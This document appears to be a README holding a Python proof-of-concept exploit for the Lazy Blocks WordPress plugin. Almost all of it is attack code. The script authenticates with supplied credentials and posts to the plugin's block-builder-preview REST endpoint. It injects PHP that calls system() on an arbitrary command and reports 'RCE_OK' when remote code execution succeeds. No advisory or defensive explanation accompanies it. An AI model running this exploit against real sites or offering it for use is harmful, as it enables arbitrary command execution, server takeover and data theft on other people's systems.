README.md
Rendering markdown...
import requests
import base64
import json
import sys
if len(sys.argv) != 5:
print(f"[!] Usage: {sys.argv[0]} <target_url> <username> <password> <command>")
sys.exit(1)
TARGET = sys.argv[1].rstrip("/")
USERNAME = sys.argv[2]
PASSWORD = sys.argv[3]
COMMAND = sys.argv[4]
endpoint = f"{TARGET}/wp-json/lazy-blocks/v1/block-builder-preview/"
auth = base64.b64encode(f"{USERNAME}:{PASSWORD}".encode()).decode()
headers = {
"Authorization": f"Basic {auth}",
"Content-Type": "application/json"
}
payload = {
"context": "editor",
"block": {
"slug": "exploit",
"code_output_method": "php",
"code_editor_html": f"<?php echo 'RCE_OK:'; system('{COMMAND}'); ?>"
}
}
try:
r = requests.post(endpoint, headers=headers, data=json.dumps(payload), timeout=10)
if r.status_code == 200 and "RCE_OK" in r.text:
print("[+] Exploit successful")
print(r.text)
else:
print("[-] Exploit failed")
print("Status:", r.status_code)
print(r.text)
except requests.exceptions.RequestException as e:
print("[-] Request error:", e)